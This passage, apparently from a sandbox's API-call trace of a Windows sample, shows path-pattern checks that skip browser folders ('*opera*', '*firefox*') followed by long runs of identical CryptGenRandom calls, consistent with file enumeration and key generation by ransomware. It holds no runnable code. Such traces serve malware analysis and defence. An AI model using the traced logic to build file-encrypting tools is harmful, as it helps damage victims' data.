pszSpec="*opera*") returned 0 [0159.181] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0159.181] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui", pszSpec="*") returned 1 [0159.181] strlen (_Str="NMoreira") returned 0x8 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.181] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.182] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.183] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.184] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | 